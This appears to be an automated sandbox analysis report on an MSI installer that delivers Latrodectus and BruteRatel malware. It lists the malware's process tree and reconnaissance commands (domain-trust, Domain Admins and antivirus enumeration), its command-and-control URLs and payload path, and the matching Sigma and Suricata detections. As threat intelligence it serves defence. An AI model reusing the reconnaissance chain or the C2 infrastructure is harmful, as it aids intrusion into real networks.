Edit tour

Windows Analysis Report
zdi.txt.msi

Overview

General Information

Sample name:	zdi.txt.msi
Analysis ID:	1566849
MD5:	71f04fe0afc51fee5e68e33431a7fb51
SHA1:	81952c2d3bb3558ec36900877080dbae0dc6a8bb
SHA256:	61365e29247428b26c8a6ca0d6326bbd04c2c798d7abad1660338ce3c11c68c4
Tags:	msiTA578user-k3dg3___
Infos:

Detection

BruteRatel, Latrodectus

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Suricata IDS alerts for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected BruteRatel

Yara detected Latrodectus

AI detected suspicious sample

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Checks if browser processes are running

Contains functionality to inject threads in other processes

Contains functionality to steal Internet Explorer form passwords

Creates a thread in another existing process (thread injection)

Drops executables to the windows directory (C:\Windows) and starts them

Injects a PE file into a foreign processes

Injects code into the Windows Explorer (explorer.exe)

Performs a network lookup / discovery via net view

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Sample uses string decryption to hide its real strings

Sets debug register (to hijack the execution of another thread)

Sigma detected: RunDLL32 Spawning Explorer

Tries to harvest and steal browser information (history, passwords, etc)

Uses ipconfig to lookup or modify the Windows network settings

Uses net.exe to modify the status of services

Uses whoami command line tool to query computer and username

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Checks for available system drives (often done to infect USB drives)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to query network adapater information

Contains functionality to read device registry values (via SetupAPI)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Deletes files inside the Windows folder

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain checking for process token information

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Launches processes in debugging mode, may be used to hinder debugging

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries device information via Setup API

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the current domain controller via net

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Suspicious Group And Account Reconnaissance Activity Using Net.EXE

Suricata IDS alerts with low severity for network traffic

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

msiexec.exe (PID: 7428 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\zdi.txt.msi" MD5: E5DA170027542E25EDE42FC54C929077)

msiexec.exe (PID: 7468 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)

msiexec.exe (PID: 7532 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 55FA980756605C03F579DEFA7A4ADAF1 MD5: 9D09DC1EDA745A5F87553048E57620CF)

MSI48D4.tmp (PID: 7608 cmdline: "C:\Windows\Installer\MSI48D4.tmp" /DontWait C:/Windows/SysWOW64/rundll32.exe C:\Users\user\AppData\Roaming\wait.dll, Jump MD5: B9545ED17695A32FACE8C3408A6A3553)

rundll32.exe (PID: 7640 cmdline: "C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\wait.dll, Jump MD5: 889B99C52A60DD49227C5E485A016679)

rundll32.exe (PID: 7664 cmdline: "C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\wait.dll, Jump MD5: EF3179D498793BF4234F708D3BE28633)

explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)

cmd.exe (PID: 3980 cmdline: /c ipconfig /all MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

ipconfig.exe (PID: 7608 cmdline: ipconfig /all MD5: 62F170FB07FDBB79CEB7147101406EB8)

cmd.exe (PID: 7188 cmdline: /c systeminfo MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

systeminfo.exe (PID: 7748 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)

WmiPrvSE.exe (PID: 5324 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

cmd.exe (PID: 4020 cmdline: /c nltest /domain_trusts MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

nltest.exe (PID: 7924 cmdline: nltest /domain_trusts MD5: 70E221CE763EA128DBA484B2E4903DE1)

cmd.exe (PID: 4900 cmdline: /c nltest /domain_trusts /all_trusts MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 1272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

nltest.exe (PID: 8000 cmdline: nltest /domain_trusts /all_trusts MD5: 70E221CE763EA128DBA484B2E4903DE1)

cmd.exe (PID: 8004 cmdline: /c net view /all /domain MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

net.exe (PID: 708 cmdline: net view /all /domain MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)

cmd.exe (PID: 7052 cmdline: /c net view /all MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

net.exe (PID: 6412 cmdline: net view /all MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)

cmd.exe (PID: 3248 cmdline: /c net group "Domain Admins" /domain MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 2920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

net.exe (PID: 2944 cmdline: net group "Domain Admins" /domain MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)

net1.exe (PID: 5752 cmdline: C:\Windows\system32\net1 group "Domain Admins" /domain MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)

WMIC.exe (PID: 3068 cmdline: /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

conhost.exe (PID: 5840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 1720 cmdline: /c net config workstation MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 3716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

net.exe (PID: 2164 cmdline: net config workstation MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)

net1.exe (PID: 5916 cmdline: C:\Windows\system32\net1 config workstation MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)

cmd.exe (PID: 504 cmdline: /c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName | findstr /V /B /C:displayName || echo No Antivirus installed MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 2932 cmdline: wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

findstr.exe (PID: 2840 cmdline: findstr /V /B /C:displayName MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)

cmd.exe (PID: 4928 cmdline: /c whoami /groups MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

whoami.exe (PID: 4192 cmdline: whoami /groups MD5: A4A6924F3EAF97981323703D38FD99C4)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Brute Ratel C4, BruteRatel	Brute Ratel C4 (BRC4) is a commercial framework for red-teaming and adversarial attack simulation, which made its first appearance in December 2020. It was specifically designed to evade detection by endpoint detection and response (EDR) and antivirus (AV) capabilities. BRC4 allows operators to deploy a backdoor agent known as Badger (aka BOLDBADGER) within a target environment.This agent enables arbitrary command execution, facilitating lateral movement, privilege escalation, and the establishment of additional persistence avenues. The Badger backdoor agent can communicate with a remote server via DNS over HTTPS, HTTP, HTTPS, SMB, and TCP, using custom encrypted channels. It supports a variety of backdoor commands including shell command execution, file transfers, file execution, and credential harvesting. Additionally, the Badger agent can perform tasks such as port scanning, screenshot capturing, and keystroke logging. Notably, in September 2022, a cracked version of Brute Ratel C4 was leaked in the cybercriminal underground, leading to its use by threat actors.	No Attribution	https://0xdarkvortex.dev/hiding-in-plainsight/ https://0xdarkvortex.dev/proxying-dll-loads-for-hiding-etwti-stack-tracing/ https://andreafortuna.org/2023/02/23/how-to-detect-brute-ratel-activities https://blog.krakz.fr/articles/latrodectus/ https://blog.reveng.ai/latrodectus-distribution-via-brc4/	https://malpedia.caad.fkie.fraunhofer.de/details/win.brute_ratel_c4

Name	Description	Attribution	Blogpost URLs	Link
Latrodectus, Latrodectus	First discovered in October 2023, BLACKWIDOW is a backdoor written in C that communicates over HTTP using RC4 encrypted requests. The malware has the capability to execute discovery commands, query information about the victim's machine, update itself, as well as download and execute an EXE, DLL, or shellcode. The malware is believed to have been developed by LUNAR SPIDER, the creators of IcedID (aka BokBot) Malware.	No Attribution	https://0x0d4y.blog/case-study-analyzing-and-implementing-string-decryption-algorithms-latrodectus/ https://0x0d4y.blog/latrodectus-technical-analysis-of-the-new-icedid/ https://any.run/malware-trends/latrodectus https://blog.krakz.fr/articles/latrodectus/ https://blog.reveng.ai/latrodectus-distribution-via-brc4/	https://malpedia.caad.fkie.fraunhofer.de/details/win.latrodectus

Malware Configuration

Threatname: Latrodectus

{"C2 url": ["https://reateberam.com/test/", "https://dogirafer.com/test/"], "Group Name": "Lambda", "Campaign ID": 3306744842}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000009.00000002.4132374823.0000000009F9A000.00000004.00000010.00020000.00000000.sdmp	JoeSecurity_Latrodectus	Yara detected Latrodectus	Joe Security
00000005.00000002.4125925258.0000023CDAA1C000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BruteRatel_1	Yara detected BruteRatel	Joe Security
00000005.00000003.2049513486.0000023CDAA4B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BruteRatel_1	Yara detected BruteRatel	Joe Security
Process Memory Space: rundll32.exe PID: 7664	JoeSecurity_BruteRatel_1	Yara detected BruteRatel	Joe Security
Process Memory Space: explorer.exe PID: 2580	JoeSecurity_Latrodectus	Yara detected Latrodectus	Joe Security
decrypted.memstr	JoeSecurity_Latrodectus	Yara detected Latrodectus	Joe Security
Click to see the 1 entries

Sigma Signatures

System Summary

Sigma detected: RunDLL32 Spawning Explorer

Source: Process started

Author: elhoim, CD_ROM_: Data: Command: C:\Windows\Explorer.EXE, CommandLine: C:\Windows\Explorer.EXE, CommandLine|base64offset|contains: , Image: C:\Windows\explorer.exe, NewProcessName: C:\Windows\explorer.exe, OriginalFileName: C:\Windows\explorer.exe, ParentCommandLine: "C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\wait.dll, Jump, ParentImage: C:\Windows\System32\rundll32.exe, ParentProcessId: 7664, ParentProcessName: rundll32.exe, ProcessCommandLine: C:\Windows\Explorer.EXE, ProcessId: 2580, ProcessName: explorer.exe

Sigma detected: Suspicious Group And Account Reconnaissance Activity Using Net.EXE

Source: Process started

Author: Florian Roth (Nextron Systems), omkar72, @svch0st, Nasreddine Bencherchali (Nextron Systems): Data: Command: net group "Domain Admins" /domain, CommandLine: net group "Domain Admins" /domain, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: /c net group "Domain Admins" /domain, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3248, ParentProcessName: cmd.exe, ProcessCommandLine: net group "Domain Admins" /domain, ProcessId: 2944, ProcessName: net.exe

Sigma detected: Local Accounts Discovery

Source: Process started

Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: whoami /groups, CommandLine: whoami /groups, CommandLine|base64offset|contains: , Image: C:\Windows\System32\whoami.exe, NewProcessName: C:\Windows\System32\whoami.exe, OriginalFileName: C:\Windows\System32\whoami.exe, ParentCommandLine: /c whoami /groups, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 4928, ParentProcessName: cmd.exe, ProcessCommandLine: whoami /groups, ProcessId: 4192, ProcessName: whoami.exe

Sigma detected: Net.exe Execution

Source: Process started

Author: Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements): Data: Command: net view /all /domain, CommandLine: net view /all /domain, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: /c net view /all /domain, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 8004, ParentProcessName: cmd.exe, ProcessCommandLine: net view /all /domain, ProcessId: 708, ProcessName: net.exe

Sigma detected: Share And Session Enumeration Using Net.EXE

Source: Process started

Author: Endgame, JHasenbusch (ported for oscd.community): Data: Command: net view /all /domain, CommandLine: net view /all /domain, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: /c net view /all /domain, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 8004, ParentProcessName: cmd.exe, ProcessCommandLine: net view /all /domain, ProcessId: 708, ProcessName: net.exe

Sigma detected: Suspicious Network Command

Source: Process started

Author: frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io': Data: Command: /c ipconfig /all, CommandLine: /c ipconfig /all, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 2580, ParentProcessName: explorer.exe, ProcessCommandLine: /c ipconfig /all, ProcessId: 3980, ProcessName: cmd.exe

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-02T18:40:59.589693+0100	2028371	3	Unknown Traffic	192.168.2.4	49865	104.21.16.251	443	TCP
2024-12-02T18:41:02.966560+0100	2028371	3	Unknown Traffic	192.168.2.4	49873	104.21.16.251	443	TCP
2024-12-02T18:41:05.046080+0100	2028371	3	Unknown Traffic	192.168.2.4	49879	104.21.16.251	443	TCP
2024-12-02T18:41:07.769254+0100	2028371	3	Unknown Traffic	192.168.2.4	49885	104.21.16.251	443	TCP
2024-12-02T18:41:09.886491+0100	2028371	3	Unknown Traffic	192.168.2.4	49891	104.21.16.251	443	TCP
2024-12-02T18:41:15.460308+0100	2028371	3	Unknown Traffic	192.168.2.4	49904	104.21.16.251	443	TCP
2024-12-02T18:41:19.294816+0100	2028371	3	Unknown Traffic	192.168.2.4	49914	104.21.16.251	443	TCP
2024-12-02T18:41:25.971166+0100	2028371	3	Unknown Traffic	192.168.2.4	49929	104.21.16.251	443	TCP
2024-12-02T18:41:28.050993+0100	2028371	3	Unknown Traffic	192.168.2.4	49934	104.21.16.251	443	TCP
2024-12-02T18:41:30.336857+0100	2028371	3	Unknown Traffic	192.168.2.4	49940	104.21.16.251	443	TCP
2024-12-02T18:41:32.576157+0100	2028371	3	Unknown Traffic	192.168.2.4	49946	104.21.16.251	443	TCP
2024-12-02T18:41:34.956798+0100	2028371	3	Unknown Traffic	192.168.2.4	49953	104.21.16.251	443	TCP
2024-12-02T18:41:37.058991+0100	2028371	3	Unknown Traffic	192.168.2.4	49956	104.21.16.251	443	TCP
2024-12-02T18:41:39.300163+0100	2028371	3	Unknown Traffic	192.168.2.4	49962	104.21.16.251	443	TCP
2024-12-02T18:41:41.150831+0100	2028371	3	Unknown Traffic	192.168.2.4	49967	104.21.68.89	443	TCP
2024-12-02T18:41:44.143135+0100	2028371	3	Unknown Traffic	192.168.2.4	49974	104.21.68.89	443	TCP
2024-12-02T18:41:47.125173+0100	2028371	3	Unknown Traffic	192.168.2.4	49982	104.21.68.89	443	TCP
2024-12-02T18:41:50.110280+0100	2028371	3	Unknown Traffic	192.168.2.4	49988	104.21.68.89	443	TCP
2024-12-02T18:41:53.449931+0100	2028371	3	Unknown Traffic	192.168.2.4	49997	104.21.68.89	443	TCP
2024-12-02T18:41:56.555095+0100	2028371	3	Unknown Traffic	192.168.2.4	50005	104.21.68.89	443	TCP
2024-12-02T18:41:59.485709+0100	2028371	3	Unknown Traffic	192.168.2.4	50013	104.21.68.89	443	TCP
2024-12-02T18:42:02.448685+0100	2028371	3	Unknown Traffic	192.168.2.4	50020	104.21.68.89	443	TCP
2024-12-02T18:42:05.415411+0100	2028371	3	Unknown Traffic	192.168.2.4	50027	104.21.68.89	443	TCP
2024-12-02T18:42:08.224133+0100	2028371	3	Unknown Traffic	192.168.2.4	50032	104.21.68.89	443	TCP
2024-12-02T18:42:10.849973+0100	2028371	3	Unknown Traffic	192.168.2.4	50033	104.21.16.251	443	TCP
2024-12-02T18:42:12.761517+0100	2028371	3	Unknown Traffic	192.168.2.4	50034	104.21.16.251	443	TCP
2024-12-02T18:42:14.845763+0100	2028371	3	Unknown Traffic	192.168.2.4	50035	104.21.16.251	443	TCP
2024-12-02T18:42:17.007950+0100	2028371	3	Unknown Traffic	192.168.2.4	50036	104.21.16.251	443	TCP
2024-12-02T18:42:19.248403+0100	2028371	3	Unknown Traffic	192.168.2.4	50037	104.21.16.251	443	TCP
2024-12-02T18:42:21.540616+0100	2028371	3	Unknown Traffic	192.168.2.4	50038	104.21.16.251	443	TCP
2024-12-02T18:42:24.045301+0100	2028371	3	Unknown Traffic	192.168.2.4	50039	104.21.16.251	443	TCP
2024-12-02T18:42:26.702583+0100	2028371	3	Unknown Traffic	192.168.2.4	50040	104.21.16.251	443	TCP
2024-12-02T18:42:28.891574+0100	2028371	3	Unknown Traffic	192.168.2.4	50041	104.21.16.251	443	TCP
2024-12-02T18:42:31.127177+0100	2028371	3	Unknown Traffic	192.168.2.4	50042	104.21.16.251	443	TCP
2024-12-02T18:42:33.327528+0100	2028371	3	Unknown Traffic	192.168.2.4	50043	104.21.16.251	443	TCP
2024-12-02T18:42:35.383394+0100	2028371	3	Unknown Traffic	192.168.2.4	50044	104.21.16.251	443	TCP
2024-12-02T18:42:37.726874+0100	2028371	3	Unknown Traffic	192.168.2.4	50045	104.21.16.251	443	TCP
2024-12-02T18:42:40.253728+0100	2028371	3	Unknown Traffic	192.168.2.4	50046	104.21.16.251	443	TCP
2024-12-02T18:42:42.407431+0100	2028371	3	Unknown Traffic	192.168.2.4	50047	104.21.16.251	443	TCP
2024-12-02T18:42:44.540661+0100	2028371	3	Unknown Traffic	192.168.2.4	50048	104.21.16.251	443	TCP
2024-12-02T18:42:47.673602+0100	2028371	3	Unknown Traffic	192.168.2.4	50049	104.21.16.251	443	TCP
2024-12-02T18:42:50.285356+0100	2028371	3	Unknown Traffic	192.168.2.4	50050	104.21.68.89	443	TCP
2024-12-02T18:42:53.310811+0100	2028371	3	Unknown Traffic	192.168.2.4	50051	104.21.68.89	443	TCP
2024-12-02T18:42:56.369892+0100	2028371	3	Unknown Traffic	192.168.2.4	50052	104.21.68.89	443	TCP
2024-12-02T18:42:59.331534+0100	2028371	3	Unknown Traffic	192.168.2.4	50053	104.21.68.89	443	TCP
2024-12-02T18:43:02.232328+0100	2028371	3	Unknown Traffic	192.168.2.4	50054	104.21.68.89	443	TCP
2024-12-02T18:43:05.403333+0100	2028371	3	Unknown Traffic	192.168.2.4	50055	104.21.68.89	443	TCP

ET MALWARE Latrodectus Loader Related Activity (POST)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-02T18:40:59.643959+0100	2048735	1	A Network Trojan was detected	192.168.2.4	49865	104.21.16.251	443	TCP
2024-12-02T18:41:03.696638+0100	2048735	1	A Network Trojan was detected	192.168.2.4	49873	104.21.16.251	443	TCP
2024-12-02T18:41:05.812203+0100	2048735	1	A Network Trojan was detected	192.168.2.4	49879	104.21.16.251	443	TCP
2024-12-02T18:41:08.550860+0100	2048735	1	A Network Trojan was detected	192.168.2.4	49885	104.21.16.251	443	TCP
2024-12-02T18:41:25.972011+0100	2048735	1	A Network Trojan was detected	192.168.2.4	49929	104.21.16.251	443	TCP
2024-12-02T18:41:28.838413+0100	2048735	1	A Network Trojan was detected	192.168.2.4	49934	104.21.16.251	443	TCP
2024-12-02T18:41:31.154781+0100	2048735	1	A Network Trojan was detected	192.168.2.4	49940	104.21.16.251	443	TCP
2024-12-02T18:41:33.284111+0100	2048735	1	A Network Trojan was detected	192.168.2.4	49946	104.21.16.251	443	TCP
2024-12-02T18:41:35.701587+0100	2048735	1	A Network Trojan was detected	192.168.2.4	49953	104.21.16.251	443	TCP
2024-12-02T18:41:37.059956+0100	2048735	1	A Network Trojan was detected	192.168.2.4	49956	104.21.16.251	443	TCP
2024-12-02T18:41:39.585644+0100	2048735	1	A Network Trojan was detected	192.168.2.4	49962	104.21.16.251	443	TCP
2024-12-02T18:41:42.730972+0100	2048735	1	A Network Trojan was detected	192.168.2.4	49967	104.21.68.89	443	TCP
2024-12-02T18:41:45.759525+0100	2048735	1	A Network Trojan was detected	192.168.2.4	49974	104.21.68.89	443	TCP
2024-12-02T18:41:48.715580+0100	2048735	1	A Network Trojan was detected	192.168.2.4	49982	104.21.68.89	443	TCP
2024-12-02T18:41:51.735785+0100	2048735	1	A Network Trojan was detected	192.168.2.4	49988	104.21.68.89	443	TCP
2024-12-02T18:41:55.211081+0100	2048735	1	A Network Trojan was detected	192.168.2.4	49997	104.21.68.89	443	TCP
2024-12-02T18:41:58.162801+0100	2048735	1	A Network Trojan was detected	192.168.2.4	50005	104.21.68.89	443	TCP
2024-12-02T18:42:01.088823+0100	2048735	1	A Network Trojan was detected	192.168.2.4	50013	104.21.68.89	443	TCP
2024-12-02T18:42:04.060875+0100	2048735	1	A Network Trojan was detected	192.168.2.4	50020	104.21.68.89	443	TCP
2024-12-02T18:42:06.835906+0100	2048735	1	A Network Trojan was detected	192.168.2.4	50027	104.21.68.89	443	TCP
2024-12-02T18:42:09.555826+0100	2048735	1	A Network Trojan was detected	192.168.2.4	50032	104.21.68.89	443	TCP
2024-12-02T18:42:11.540882+0100	2048735	1	A Network Trojan was detected	192.168.2.4	50033	104.21.16.251	443	TCP
2024-12-02T18:42:13.494514+0100	2048735	1	A Network Trojan was detected	192.168.2.4	50034	104.21.16.251	443	TCP
2024-12-02T18:42:15.582966+0100	2048735	1	A Network Trojan was detected	192.168.2.4	50035	104.21.16.251	443	TCP
2024-12-02T18:42:17.776156+0100	2048735	1	A Network Trojan was detected	192.168.2.4	50036	104.21.16.251	443	TCP
2024-12-02T18:42:20.026699+0100	2048735	1	A Network Trojan was detected	192.168.2.4	50037	104.21.16.251	443	TCP
2024-12-02T18:42:22.290666+0100	2048735	1	A Network Trojan was detected	192.168.2.4	50038	104.21.16.251	443	TCP
2024-12-02T18:42:25.068260+0100	2048735	1	A Network Trojan was detected	192.168.2.4	50039	104.21.16.251	443	TCP
2024-12-02T18:42:27.484092+0100	2048735	1	A Network Trojan was detected	192.168.2.4	50040	104.21.16.251	443	TCP
2024-12-02T18:42:29.676480+0100	2048735	1	A Network Trojan was detected	192.168.2.4	50041	104.21.16.251	443	TCP
2024-12-02T18:42:31.942287+0100	2048735	1	A Network Trojan was detected	192.168.2.4	50042	104.21.16.251	443	TCP
2024-12-02T18:42:34.080539+0100	2048735	1	A Network Trojan was detected	192.168.2.4	50043	104.21.16.251	443	TCP
2024-12-02T18:42:36.101383+0100	2048735	1	A Network Trojan was detected	192.168.2.4	50044	104.21.16.251	443	TCP
2024-12-02T18:42:38.428947+0100	2048735	1	A Network Trojan was detected	192.168.2.4	50045	104.21.16.251	443	TCP
2024-12-02T18:42:41.002330+0100	2048735	1	A Network Trojan was detected	192.168.2.4	50046	104.21.16.251	443	TCP
2024-12-02T18:42:43.175130+0100	2048735	1	A Network Trojan was detected	192.168.2.4	50047	104.21.16.251	443	TCP
2024-12-02T18:42:45.282106+0100	2048735	1	A Network Trojan was detected	192.168.2.4	50048	104.21.16.251	443	TCP
2024-12-02T18:42:48.855372+0100	2048735	1	A Network Trojan was detected	192.168.2.4	50049	104.21.16.251	443	TCP
2024-12-02T18:42:51.894786+0100	2048735	1	A Network Trojan was detected	192.168.2.4	50050	104.21.68.89	443	TCP
2024-12-02T18:42:54.920793+0100	2048735	1	A Network Trojan was detected	192.168.2.4	50051	104.21.68.89	443	TCP
2024-12-02T18:42:57.996951+0100	2048735	1	A Network Trojan was detected	192.168.2.4	50052	104.21.68.89	443	TCP
2024-12-02T18:43:00.907175+0100	2048735	1	A Network Trojan was detected	192.168.2.4	50053	104.21.68.89	443	TCP
2024-12-02T18:43:03.873929+0100	2048735	1	A Network Trojan was detected	192.168.2.4	50054	104.21.68.89	443	TCP

ET MALWARE Zbot Generic URI/Header Struct .bin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-02T18:41:12.455437+0100	2018052	1	A Network Trojan was detected	192.168.2.4	49891	104.21.16.251	443	TCP
2024-12-02T18:41:17.893017+0100	2018052	1	A Network Trojan was detected	192.168.2.4	49904	104.21.16.251	443	TCP
2024-12-02T18:41:21.232686+0100	2018052	1	A Network Trojan was detected	192.168.2.4	49914	104.21.16.251	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-02T18:41:12.455437+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49891	104.21.16.251	443	TCP
2024-12-02T18:41:21.232686+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49914	104.21.16.251	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://reateberam.com/=	Avira URL Cloud: Label: malware
Source: https://reateberam.com/test/	Avira URL Cloud: Label: malware
Source: https://reateberam.com/test/5865723_17335797906044_2080493URLS1https://dogirafer.com/test/5205754_80	Avira URL Cloud: Label: malware
Source: https://reateberam.com/test/32.dll	Avira URL Cloud: Label: malware
Source: https://reateberam.com/	Avira URL Cloud: Label: malware
Source: https://reateberam.com/test/v	Avira URL Cloud: Label: malware
Source: https://reateberam.com/test/4782396_3336673150375_5876994URLS1https://dogirafer.com/test/7951999_661	Avira URL Cloud: Label: malware
Source: https://reateberam.com/files/stkm.binbm	Avira URL Cloud: Label: malware
Source: https://reateberam.com/test/1424693_495962074200_3017094URLS1https://dogirafer.com/test/3578852_8133	Avira URL Cloud: Label: malware
Source: https://reateberam.com/test/7765524_55360872352224_4448453URLS1https://dogirafer.com/test/604857_961	Avira URL Cloud: Label: malware
Source: https://reateberam.com/files/stkm.bin	Avira URL Cloud: Label: malware
Source: https://reateberam.com/test/3426159_38935932553563_5901982URLS1https://dogirafer.com/test/8447341_42	Avira URL Cloud: Label: malware

Found malware configuration

Source: 9.0.explorer.exe.1370000.0.raw.unpack

Malware Configuration Extractor: Latrodectus {"C2 url": ["https://reateberam.com/test/", "https://dogirafer.com/test/"], "Group Name": "Lambda", "Campaign ID": 3306744842}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Sample uses string decryption to hide its real strings

